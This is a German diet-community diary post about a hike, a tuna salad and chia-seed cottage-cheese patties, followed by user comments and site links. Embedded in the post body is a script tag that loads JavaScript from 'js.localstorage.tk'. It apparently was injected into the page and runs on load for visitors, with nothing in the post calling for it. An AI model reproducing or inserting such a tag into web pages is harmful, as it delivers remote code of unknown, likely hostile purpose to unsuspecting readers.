Zum Inhalt springen

Sie sind hier

Geht auch anders

0  0
Am von im Ernährungstagebuch geschrieben

Voll motiviert bin ich heut morgen los um auf den Regensberg zu wandern.Meine Fresse hätt ich gewusst das ich ne fast 90Grad Steigung hab wär ich nicht auf die Idee gekommen:-) Naja leider kam ich dann in den Wald und ging in verschiedene Richtungen, doch nirgendwo war zu ersehen wie es weiter geht, dann kam noch der kleine Angsthase angehüpft als da paar Geräusche kamen und ich nahm einen bekannteren Weg wieder herab zu Orten die ich kenne. Naja nach knapp 13 km bin ich dann zu Hause eingetrudelt und hab mich zur Belohnung auf den Balkon gelegt und hab meine Bräune wieder in Schokocrossibraun aufgefrischt Smile

Schööööööön, also heute gabs keine Energieräuber, dafür aber ein sehr leckeres Mittag :

Gurken-Tomaten-Paprika-Zwiebel-Thunfischsalat mit selbstgemachter leichter Joghurt/Chilidressing Smile Lecker wars und satt bin ich auch ....Und immernoch kein Anruf den ich soooo sehr entgegen fiebere.

Heute Abend wieder allein, naja nach dem Tag werd ich wohl trotzdem gut schlafen Wink

Und was gibts zu Essen? Mal wieder Hüttenkäsetaler, man da habt Ihr was angerichtet , die sind einfach göttlich.Heute hab ich mal Chiasamen als Mehlersatz genommen Smile

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

*** Das Leben ist zu kurz um aufzugeben ***

Vorheriger Ernährungstagebuch-Eintrag
Bild von Ruba Heisshunger besser kontrollieren
Nächster Ernährungstagebuch-Eintrag
Bild von Emma09 21.08.2014 naja,nun soll ja das

Kommentare

Bild des Benutzers Emma09
0  0

wieder alleine - man da können wir doch eine Party steigen lassen suppi I-m so happy

Bild des Benutzers laughy
0  0

Hahahaha, schon so viel abgenommen Wink

Bin einfach früh ins Bett und die Nacht ist nun geschafft Wink

*** Das Leben ist zu kurz um aufzugeben ***

Nach oben
Zur Hauptnavigation

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Eintrag in ein Ernährungstagebuch von EndlichSchlank2019: Heute gehts wieder nach Hause. Freue mich sehr auf meinen Freund Das Schwimmen gestern ist ausgefallen, stattdessen habe ich bei nem Umzug geholfen. Da hab ich mal wieder gemerkt, dass meine...
Eintrag in ein Ernährungstagebuch von Ingekarin70: Heute bin ich wieder fast konsequent, mittags Pellkartoffeln, Blumenkohl und Putenschnitzel. Zum Frühstück trinke ich von Montag bis Freitag immer nur 250 ml Kaffee mit 10 ml 1,5 %tige Milch und 10 g...
Eintrag in ein Ernährungstagebuch von Josie: Hallo ihr Lieben, bei mir klappt es leider immer noch nicht so mit dem Essverhalten auf Dauer, wie ich mir das wünsche. Jetzt bin ich schon wieder so lange am Start, aber schwupp die wupp ein...
Motivation von IQ136KG150: 1. ich werde ohne Rückenschmerzen längere Strecken gehen können und ohne völlig außer Atem zu sein in den sechsten Stock steigen (höher wohnt niemand ohne Fahrstuhl, ein Dank der deutschen...
Eintrag in ein Ernährungstagebuch von Imani64: Das waren einige Wochen in denen ich kein Protokoll geschrieben habe......und das aus gutem Grund. Gewogen hab ich mich dazwischen 2x.....und daß war natürlich nicht so berauschend. Da waren einige...
Ziel für den Abnehmplan von Juergen12053: ... mit meinen Startgewicht von 121 kg am 31.07.17 bei einer Körpergröße von 173,5 cm fühle ich mich unwohl, unbeweglich, träge und ja auch unatraktiv - das möchte ich ändern - ... und mich ab heute...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst